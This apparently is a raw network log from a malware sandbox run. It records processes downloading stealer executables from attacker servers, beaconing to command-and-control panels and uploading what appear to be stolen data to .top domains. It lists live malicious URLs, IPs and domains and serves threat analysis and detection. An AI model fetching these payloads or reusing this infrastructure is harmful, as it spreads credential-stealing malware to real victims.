Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:48:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

Explorer.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:48:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.16/inc/contorax.exe

Explorer.exe

Remote address:

185.215.113.16:80

Request

GET /inc/contorax.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:35 GMT
Content-Type: application/octet-stream
Content-Length: 104448
Last-Modified: Fri, 16 Aug 2024 21:39:51 GMT
Connection: keep-alive
ETag: "66bfc727-19800"
Accept-Ranges: bytes
GET

http://185.215.113.16/inc/3546345.exe

Explorer.exe

Remote address:

185.215.113.16:80

Request

GET /inc/3546345.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:36 GMT
Content-Type: application/octet-stream
Content-Length: 2846145
Last-Modified: Thu, 15 Aug 2024 19:15:23 GMT
Connection: keep-alive
ETag: "66be53cb-2b6dc1"
Accept-Ranges: bytes
GET

http://185.215.113.16/soka/random.exe

Explorer.exe

Remote address:

185.215.113.16:80

Request

GET /soka/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:41 GMT
Content-Type: application/octet-stream
Content-Length: 1915392
Last-Modified: Thu, 12 Sep 2024 07:15:04 GMT
Connection: keep-alive
ETag: "66e294f8-1d3a00"
Accept-Ranges: bytes
GET

http://185.215.113.16/inc/kitty.exe

Explorer.exe

Remote address:

185.215.113.16:80

Request

GET /inc/kitty.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:46 GMT
Content-Type: application/octet-stream
Content-Length: 327168
Last-Modified: Wed, 07 Aug 2024 22:38:53 GMT
Connection: keep-alive
ETag: "66b3f77d-4fe00"
Accept-Ranges: bytes
GET

http://185.215.113.16/inc/vlst.exe

Explorer.exe

Remote address:

185.215.113.16:80

Request

GET /inc/vlst.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:48 GMT
Content-Type: application/octet-stream
Content-Length: 550912
Last-Modified: Sun, 08 Sep 2024 10:50:43 GMT
Connection: keep-alive
ETag: "66dd8183-86800"
Accept-Ranges: bytes
GET

http://185.215.113.16/inc/freedom.exe

Explorer.exe

Remote address:

185.215.113.16:80

Request

GET /inc/freedom.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:49 GMT
Content-Type: application/octet-stream
Content-Length: 3715072
Last-Modified: Mon, 09 Sep 2024 08:37:12 GMT
Connection: keep-alive
ETag: "66deb3b8-38b000"
Accept-Ranges: bytes
DNS

197.193.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

197.193.67.172.in-addr.arpa

IN PTR

Response
DNS

stitchmiscpaew.shop

Remote address:

8.8.8.8:53

Request

stitchmiscpaew.shop

IN A

Response

stitchmiscpaew.shop

IN A

104.21.26.150

stitchmiscpaew.shop

IN A

172.67.136.135
DNS

steamcommunity.com

Remote address:

8.8.8.8:53

Request

steamcommunity.com

IN A

Response

steamcommunity.com

IN A

23.214.143.155
DNS

33.38.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

33.38.21.104.in-addr.arpa

IN PTR

Response
DNS

sevtv17pn.top

Remote address:

8.8.8.8:53

Request

sevtv17pn.top

IN A

Response

sevtv17pn.top

IN A

195.133.13.230
DNS

227.188.43.179.in-addr.arpa

Remote address:

8.8.8.8:53

Request

227.188.43.179.in-addr.arpa

IN PTR

Response

227.188.43.179.in-addr.arpa

IN PTR

hostedbyprivatelayercom
DNS

CvcMEMMQKdoWtsiZdkN.CvcMEMMQKdoWtsiZdkN

Remote address:

8.8.8.8:53

Request

CvcMEMMQKdoWtsiZdkN.CvcMEMMQKdoWtsiZdkN

IN A

Response
DNS

haggaifashion.com

Remote address:

8.8.8.8:53

Request

haggaifashion.com

IN A

Response

haggaifashion.com

IN A

66.29.132.136
DNS

ocsp.usertrust.com

Remote address:

8.8.8.8:53

Request

ocsp.usertrust.com

IN A

Response

ocsp.usertrust.com

IN CNAME

ocsp.comodoca.com.cdn.cloudflare.net

ocsp.comodoca.com.cdn.cloudflare.net

IN A

172.64.149.23

ocsp.comodoca.com.cdn.cloudflare.net

IN A

104.18.38.233
DNS

42.56.20.217.in-addr.arpa

Remote address:

8.8.8.8:53

Request

42.56.20.217.in-addr.arpa

IN PTR

Response
DNS

thizx13vt.top

Remote address:

8.8.8.8:53

Request

thizx13vt.top

IN A

Response
DNS

135.200.91.45.in-addr.arpa

Remote address:

8.8.8.8:53

Request

135.200.91.45.in-addr.arpa

IN PTR

Response

135.200.91.45.in-addr.arpa

IN PTR

45-91-200-135 netherlands-2vpsac
DNS

11.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.227.111.52.in-addr.arpa

IN PTR

Response
DNS

thizx13vt.top

Remote address:

8.8.8.8:53

Request

thizx13vt.top

IN A

Response
DNS

thizx13vt.top

Remote address:

8.8.8.8:53

Request

thizx13vt.top

IN A

Response
DNS

thizx13vt.top

Remote address:

8.8.8.8:53

Request

thizx13vt.top

IN A

Response
DNS

9.179.89.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.179.89.13.in-addr.arpa

IN PTR

Response
DNS

235.4.20.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

235.4.20.104.in-addr.arpa

IN PTR

Response
DNS

ignoracndwko.shop

Remote address:

8.8.8.8:53

Request

ignoracndwko.shop

IN A

Response
DNS

ignoracndwko.shop

Remote address:

8.8.8.8:53

Request

ignoracndwko.shop

IN A
DNS

155.143.214.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

155.143.214.23.in-addr.arpa

IN PTR

Response

155.143.214.23.in-addr.arpa

IN PTR

a23-214-143-155deploystaticakamaitechnologiescom
DNS

240902175059845.std.kqve01.top

Remote address:

8.8.8.8:53

Request

240902175059845.std.kqve01.top

IN A

Response

240902175059845.std.kqve01.top

IN A

179.43.188.227
DNS

147.149.200.45.in-addr.arpa

Remote address:

8.8.8.8:53

Request

147.149.200.45.in-addr.arpa

IN PTR

Response
DNS

48.231.66.45.in-addr.arpa

Remote address:

8.8.8.8:53

Request

48.231.66.45.in-addr.arpa

IN PTR

Response
DNS

ctldl.windowsupdate.com

Remote address:

8.8.8.8:53

Request

ctldl.windowsupdate.com

IN A

Response

ctldl.windowsupdate.com

IN CNAME

ctldl.windowsupdate.com.delivery.microsoft.com

ctldl.windowsupdate.com.delivery.microsoft.com

IN CNAME

wu-b-net.trafficmanager.net

wu-b-net.trafficmanager.net

IN CNAME

edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com

edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com

IN A

217.20.56.42

edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com

IN A

217.20.56.37

edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com

IN A

217.20.56.34

edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com

IN A

217.20.56.43

edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com

IN A

217.20.56.45

edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com

IN A

217.20.56.36

edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com

IN A

217.20.56.44

edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com

IN A

217.20.56.35
DNS

ocsp.sectigo.com

Remote address:

8.8.8.8:53

Request

ocsp.sectigo.com

IN A

Response

ocsp.sectigo.com

IN CNAME

ocsp.comodoca.com.cdn.cloudflare.net

ocsp.comodoca.com.cdn.cloudflare.net

IN A

172.64.149.23

ocsp.comodoca.com.cdn.cloudflare.net

IN A

104.18.38.233
DNS

233.38.18.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.38.18.104.in-addr.arpa

IN PTR

Response
DNS

thizx13vt.top

Remote address:

8.8.8.8:53

Request

thizx13vt.top

IN A

Response
DNS

thizx13vt.top

Remote address:

8.8.8.8:53

Request

thizx13vt.top

IN A

Response
DNS

nexusrules.officeapps.live.com

Remote address:

8.8.8.8:53

Request

nexusrules.officeapps.live.com

IN A

Response

nexusrules.officeapps.live.com

IN CNAME

prod.nexusrules.live.com.akadns.net

prod.nexusrules.live.com.akadns.net

IN A

52.111.227.11
DNS

thizx13vt.top

Remote address:

8.8.8.8:53

Request

thizx13vt.top

IN A

Response
DNS

thizx13vt.top

Remote address:

8.8.8.8:53

Request

thizx13vt.top

IN A

Response
DNS

thizx13vt.top

Remote address:

8.8.8.8:53

Request

thizx13vt.top

IN A

Response
DNS

ocsp.digicert.com

Remote address:

8.8.8.8:53

Request

ocsp.digicert.com

IN A

Response

ocsp.digicert.com

IN CNAME

ocsp.edge.digicert.com

ocsp.edge.digicert.com

IN CNAME

fp2e7a.wpc.2be4.phicdn.net

fp2e7a.wpc.2be4.phicdn.net

IN CNAME

fp2e7a.wpc.phicdn.net

fp2e7a.wpc.phicdn.net

IN A

192.229.221.95
DNS

ocsp.digicert.com

Remote address:

8.8.8.8:53

Request

ocsp.digicert.com

IN A

Response

ocsp.digicert.com

IN CNAME

ocsp.edge.digicert.com

ocsp.edge.digicert.com

IN CNAME

fp2e7a.wpc.2be4.phicdn.net

fp2e7a.wpc.2be4.phicdn.net

IN CNAME

fp2e7a.wpc.phicdn.net

fp2e7a.wpc.phicdn.net

IN A

192.229.221.95
GET

http://185.215.113.26/exbuild.exe

Explorer.exe

Remote address:

185.215.113.26:80

Request

GET /exbuild.exe HTTP/1.1
Host: 185.215.113.26

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 12 Sep 2024 07:47:40 GMT
Content-Type: application/x-msdos-program
Content-Length: 425984
Connection: keep-alive
Last-Modified: Sat, 24 Aug 2024 17:17:20 GMT
ETag: "68000-620711078a800"
Accept-Ranges: bytes
POST

http://sevtv17pn.top/v1/upload.php

JUmer.exe

Remote address:

195.133.13.230:80

Request

POST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary36127201
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 413
Host: sevtv17pn.top

Response

HTTP/1.1 200 OK

server: nginx/1.24.0 (Ubuntu)
date: Thu, 12 Sep 2024 07:47:43 GMT
content-type: text/plain; charset=utf-8
content-length: 2
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
POST

http://sevtv17pn.top/v1/upload.php

JUmer.exe

Remote address:

195.133.13.230:80

Request

POST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary19375461
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 75527
Host: sevtv17pn.top

Response

HTTP/1.1 200 OK

server: nginx/1.24.0 (Ubuntu)
date: Thu, 12 Sep 2024 07:47:46 GMT
content-type: text/plain; charset=utf-8
content-length: 2
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
POST

http://sevtv17pn.top/v1/upload.php

JUmer.exe

Remote address:

195.133.13.230:80

Request

POST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary39382591
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 34608
Host: sevtv17pn.top

Response

HTTP/1.1 200 OK

server: nginx/1.24.0 (Ubuntu)
date: Thu, 12 Sep 2024 07:47:50 GMT
content-type: text/plain; charset=utf-8
content-length: 2
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
GET

http://240902175059845.std.kqve01.top/f/fikbbm0902845.exe

Explorer.exe

Remote address:

179.43.188.227:80

Request

GET /f/fikbbm0902845.exe HTTP/1.1
Host: 240902175059845.std.kqve01.top

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Server: Caddy
Status: 404 Not Found
Date: Thu, 12 Sep 2024 07:47:44 GMT
Content-Length: 17
GET

http://45.200.149.147/BowExpert.exe

Explorer.exe

Remote address:

45.200.149.147:80

Request

GET /BowExpert.exe HTTP/1.1
Host: 45.200.149.147

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:47:44 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1q PHP/8.1.10
Last-Modified: Tue, 27 Aug 2024 18:59:24 GMT
ETag: "159690-620aed70b4399"
Accept-Ranges: bytes
Content-Length: 1414800
Content-Type: application/x-msdownload
DNS

23.149.64.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.149.64.172.in-addr.arpa

IN PTR

Response
DNS

transfer.adminforge.de

Remote address:

8.8.8.8:53

Request

transfer.adminforge.de

IN A

Response

transfer.adminforge.de

IN A

176.9.8.206
DNS

api64.ipify.org

Remote address:

8.8.8.8:53

Request

api64.ipify.org

IN A

Response

api64.ipify.org

IN A

173.231.16.77

api64.ipify.org

IN A

104.237.62.213
DNS

81.59.117.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

81.59.117.34.in-addr.arpa

IN PTR

Response

81.59.117.34.in-addr.arpa

IN PTR

815911734bcgoogleusercontentcom
DNS

thizx13vt.top

Remote address:

8.8.8.8:53

Request

thizx13vt.top

IN A

Response
DNS

73.144.22.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

73.144.22.2.in-addr.arpa

IN PTR

Response

73.144.22.2.in-addr.arpa

IN PTR

a2-22-144-73deploystaticakamaitechnologiescom
DNS

self.events.data.microsoft.com

Remote address:

8.8.8.8:53

Request

self.events.data.microsoft.com

IN A

Response

self.events.data.microsoft.com

IN CNAME

self-events-data.trafficmanager.net

self-events-data.trafficmanager.net

IN CNAME

onedscolprdcus09.centralus.cloudapp.azure.com

onedscolprdcus09.centralus.cloudapp.azure.com

IN A

13.89.179.9
GET

https://conditionprovice.pro/tmpdir/9872345234.cab

acentric.exe

Remote address:

81.19.139.138:443

Request

GET /tmpdir/9872345234.cab HTTP/1.1
Host: conditionprovice.pro
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Thu, 12 Sep 2024 07:48:02 GMT
Content-Type: application/octet-stream
Content-Length: 435200
Last-Modified: Sat, 07 Sep 2024 19:59:56 GMT
Connection: keep-alive
ETag: "66dcb0bc-6a400"
Accept-Ranges: bytes
GET

http://45.91.200.135/api/crazyfish.php

RegAsm.exe

Remote address:

45.91.200.135:80

Request

GET /api/crazyfish.php HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 45.91.200.135

Response

HTTP/1.1 200 OK

Date: Thu, 12 Sep 2024 07:48:17 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 6
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

185.215.113.16:80

http://185.215.113.16/Jo89Ku7d/index.php

http

axplong.exe

330.8kB
9.6MB
6906
6889

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

GET http://185.215.113.16/inc/crypteda.exe

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

GET http://185.215.113.16/inc/stealc_default2.exe

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

GET http://185.215.113.16/inc/S%D0%B5tup.exe

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

GET http://185.215.113.16/inc/penis.exe

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

GET http://185.215.113.16/inc/bundle.exe

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200

HTTP Request

GET http://185.215.113.16/dobre/acentric.exe

HTTP Response

200

HTTP Request

POST http://185.215.113.16/Jo89Ku7d/index.php

HTTP Response

200
185.215.113.117:80

http://185.215.113.117/inc/needmoney.exe

http

axplong.exe

142.4kB
4.2MB
3025
3016

HTTP Request

GET http://185.215.113.117/inc/gold.exe

HTTP Response

200

HTTP Request

GET http://185.215.113.117/inc/needmoney.exe

HTTP Response

200
95.179.250.45:26212

RegAsm.exe

260 B
200 B
5
5
185.215.113.26:80

http://185.215.113.26/Nework.exe

http

axplong.exe

15.5kB
439.0kB
326
318

HTTP Request

GET http://185.215.113.26/Nework.exe

HTTP Response

200
65.21.18.51:45580

omORvZzPVW.exe

1.6MB
23.5kB
1176
359
185.215.113.26:80

http://185.215.113.26/Dem7kTu/index.php

http

Hkbsse.exe

1.1MB
31.8MB
22785
22774

HTTP Request

POST http://185.215.113.26/Dem7kTu/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.26/Dem7kTu/index.php

HTTP Response

200

HTTP Request

GET http://185.215.113.26/JLumma.exe

HTTP Response

200

HTTP Request

POST http://185.215.113.26/Dem7kTu/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.26/Dem7kTu/index.php

HTTP Response

200

HTTP Request

GET http://185.215.113.26/JUmer.exe

HTTP Response

200

HTTP Request

POST http://185.215.113.26/Dem7kTu/index.php

HTTP Response

200
185.215.113.17:80

http://185.215.113.17/2fb6c2cc8dce150a.php

http

stealc_default2.exe

197.6kB
5.4MB
3916
3902

HTTP Request

GET http://185.215.113.17/

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

GET http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

GET http://185.215.113.17/f1ddeb6592c03206/freebl3.dll

HTTP Response

200

HTTP Request

GET http://185.215.113.17/f1ddeb6592c03206/mozglue.dll

HTTP Response

200

HTTP Request

GET http://185.215.113.17/f1ddeb6592c03206/msvcp140.dll

HTTP Response

200

HTTP Request

GET http://185.215.113.17/f1ddeb6592c03206/nss3.dll

HTTP Response

200

HTTP Request

GET http://185.215.113.17/f1ddeb6592c03206/softokn3.dll

HTTP Response

200

HTTP Request

GET http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200

HTTP Request

POST http://185.215.113.17/2fb6c2cc8dce150a.php

HTTP Response

200
95.216.107.53:12311

vVRF3QNBae.exe

1.5MB
28.7kB
1192
390
95.179.250.45:26212

RegAsm.exe

260 B
200 B
5
5
95.179.250.45:26212

RegAsm.exe

260 B
200 B
5
5
95.179.250.45:26212

RegAsm.exe

260 B
200 B
5
5
188.225.44.114:80

http://fivevd5sr.top/v1/upload.php

http

SÐµtup.exe

1.0kB
381 B
6
4

HTTP Request

POST http://fivevd5sr.top/v1/upload.php

HTTP Response

200
91.202.233.158:80

http://91.202.233.158/e96ea2db21fa9a1b.php

http

svchost015.exe

820 B
625 B
7
5

HTTP Request

GET http://91.202.233.158/

HTTP Response

200

HTTP Request

POST http://91.202.233.158/e96ea2db21fa9a1b.php

HTTP Response

200
185.215.113.67:15206

bundle.exe

2.0MB
36.6kB
1456
673
95.216.143.20:12695

penis.exe

1.6MB
46.7kB
1230
590
95.179.250.45:26212

RegAsm.exe

260 B
200 B
5
5
188.225.44.114:80

http://fivevd5sr.top/v1/upload.php

http

SÐµtup.exe

78.0kB
1.7kB
61
37

HTTP Request

POST http://fivevd5sr.top/v1/upload.php

HTTP Response

200
188.225.44.114:80

http://fivevd5sr.top/v1/upload.php

http

SÐµtup.exe

50.5kB
1.2kB
41
21

HTTP Request

POST http://fivevd5sr.top/v1/upload.php

HTTP Response

200
62.133.62.93:80

http://iakovosioannidis.com/parts/setup2.exe

http

Hkbsse.exe

666 B
486 B
13
5

HTTP Request

GET http://iakovosioannidis.com/parts/setup2.exe

HTTP Response

200
95.179.250.45:26212

RegAsm.exe

260 B
200 B
5
5
81.19.139.138:443

https://conditionprovice.pro/tmpdir/9872345234.cab

tls, http

acentric.exe

11.4kB
452.5kB
225
328

HTTP Request

GET https://conditionprovice.pro/tmpdir/9872345234.cab

HTTP Response

200
95.179.250.45:26212

RegAsm.exe

260 B
200 B
5
5
172.67.151.164:443

complainnykso.shop

tls

BitLockerToGo.exe

1.5kB
5.9kB
12
13
185.215.113.19:80

http://185.215.113.19/CoreOPT/index.php

http

Explorer.exe

828 B
1.9kB
8
6

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200
185.215.113.19:80

http://185.215.113.19/CoreOPT/index.php

http

Explorer.exe

249.8kB
65.3kB
3661
938

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php?scr=1

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200
185.215.113.16:80

http://185.215.113.16/inc/freedom.exe

http

Explorer.exe

329.7kB
9.8MB
7001
6993

HTTP Request

GET http://185.215.113.16/inc/contorax.exe

HTTP Response

200

HTTP Request

GET http://185.215.113.16/inc/3546345.exe

HTTP Response

200

HTTP Request

GET http://185.215.113.16/soka/random.exe

HTTP Response

200

HTTP Request

GET http://185.215.113.16/inc/kitty.exe

HTTP Response

200

HTTP Request

GET http://185.215.113.16/inc/vlst.exe

HTTP Response

200

HTTP Request

GET http://185.215.113.16/inc/freedom.exe

HTTP Response

200
104.21.78.130:443

basedsymsotp.shop

tls

BitLockerToGo.exe

1.1kB
4.9kB
9
9
172.67.193.197:443

charistmatwio.shop

tls

BitLockerToGo.exe

1.1kB
4.9kB
9
9
104.20.4.235:443

pastebin.com

tls

winmsbt.exe

917 B
5.6kB
9
10
104.21.48.158:443

grassemenwji.shop

tls

BitLockerToGo.exe

1.1kB
4.8kB
9
8
104.21.26.150:443

stitchmiscpaew.shop

tls

BitLockerToGo.exe

1.1kB
4.8kB
9
9
104.21.38.33:443

commisionipwn.shop

tls

BitLockerToGo.exe

1.1kB
4.9kB
9
9
23.214.143.155:443

steamcommunity.com

tls

BitLockerToGo.exe

1.6kB
42.7kB
23
37
185.215.113.26:80

http://185.215.113.26/exbuild.exe

http

Explorer.exe

14.8kB
439.0kB
319
318

HTTP Request

GET http://185.215.113.26/exbuild.exe

HTTP Response

200
95.179.250.45:26212

RegAsm.exe

260 B
200 B
5
5
65.21.18.51:45580

hu01pHYE3x.exe

1.5MB
23.3kB
1137
373
95.216.107.53:12311

rEA2qvRRsI.exe

1.5MB
29.4kB
1198
405
195.133.13.230:80

http://sevtv17pn.top/v1/upload.php

http

JUmer.exe

115.3kB
1.8kB
92
31

HTTP Request

POST http://sevtv17pn.top/v1/upload.php

HTTP Response

200

HTTP Request

POST http://sevtv17pn.top/v1/upload.php

HTTP Response

200

HTTP Request

POST http://sevtv17pn.top/v1/upload.php

HTTP Response

200
179.43.188.227:80

http://240902175059845.std.kqve01.top/f/fikbbm0902845.exe

http

Explorer.exe

535 B
550 B
10
9

HTTP Request

GET http://240902175059845.std.kqve01.top/f/fikbbm0902845.exe

HTTP Response

404
45.200.149.147:80

http://45.200.149.147/BowExpert.exe

http

Explorer.exe

50.9kB
1.5MB
1066
1064

HTTP Request

GET http://45.200.149.147/BowExpert.exe

HTTP Response

200
95.179.250.45:26212

RegAsm.exe

260 B
200 B
5
5
45.66.231.48:80

http

vlst.exe

2.0MB
55.1kB
1451
773
66.29.132.136:443

haggaifashion.com

tls

Explorer.exe

166.9kB
4.7MB
3375
3371
188.124.59.28:443

freedom.exe

208 B
4
95.179.250.45:26212

RegAsm.exe

260 B
200 B
5
5
212.113.116.202:80

RegAsm.exe

260 B
5
176.9.8.206:443

transfer.adminforge.de

Explorer.exe

156 B
3
95.179.250.45:26212

RegAsm.exe

260 B
200 B
5
5
81.19.139.138:443

https://conditionprovice.pro/tmpdir/9872345234.cab

tls, http

acentric.exe

10.7kB
452.5kB
206
328

HTTP Request

GET https://conditionprovice.pro/tmpdir/9872345234.cab

HTTP Response

200
45.156.25.118:443

freedom.exe

208 B
4
52.111.229.19:443

322 B
7
95.179.250.45:26212

RegAsm.exe

260 B
200 B
5
5
176.9.8.206:443

transfer.adminforge.de

Explorer.exe

156 B
3
188.124.59.28:443

freedom.exe

208 B
4
95.179.250.45:26212

RegAsm.exe

260 B
200 B
5
5
45.91.200.135:80

http://45.91.200.135/api/crazyfish.php

http

RegAsm.exe

481 B
431 B
6
4

HTTP Request

GET http://45.91.200.135/api/crazyfish.php

HTTP Response

200
173.231.16.77:443

api64.ipify.org

tls

RegAsm.exe

977 B
5.4kB
9
10
176.9.8.206:443

transfer.adminforge.de

Explorer.exe

156 B
3
34.117.59.81:443

ipinfo.io

tls

RegAsm.exe

961 B
5.7kB
8
9
45.200.149.147:27667

RegAsm.exe

2.0MB
50.8kB
1441
624
95.179.250.45:26212

RegAsm.exe

260 B
200 B
5
5
188.124.59.28:443

freedom.exe

208 B
4
95.179.250.45:26212

RegAsm.exe

260 B
200 B
5
5
95.179.250.45:26212

RegAsm.exe

260 B
200 B
5
5
95.179.250.45:26212

RegAsm.exe

260 B
200 B
5
5
95.179.250.45:26212

RegAsm.exe

260 B
200 B
5
5
95.179.250.45:26212

RegAsm.exe

260 B
200 B
5
5
95.179.250.45:26212

RegAsm.exe

260 B
200 B
5
5
95.179.250.45:26212

RegAsm.exe

104 B
80 B
2
2

8.8.8.8:53

16.113.215.185.in-addr.arpa

dns

883 B
1.5kB
13
13

DNS Request

16.113.215.185.in-addr.arpa

DNS Request

51.18.21.65.in-addr.arpa

DNS Request

17.113.215.185.in-addr.arpa

DNS Request

114.44.225.188.in-addr.arpa

DNS Request

iakovosioannidis.com

DNS Response

62.133.62.93

DNS Request

138.139.19.81.in-addr.arpa

DNS Request

164.151.67.172.in-addr.arpa

DNS Request

basedsymsotp.shop

DNS Response

104.21.78.130

172.67.221.198

DNS Request

pastebin.com

DNS Response

104.20.4.235

172.67.19.24

104.20.3.235

DNS Request

130.78.21.104.in-addr.arpa

DNS Request

commisionipwn.shop

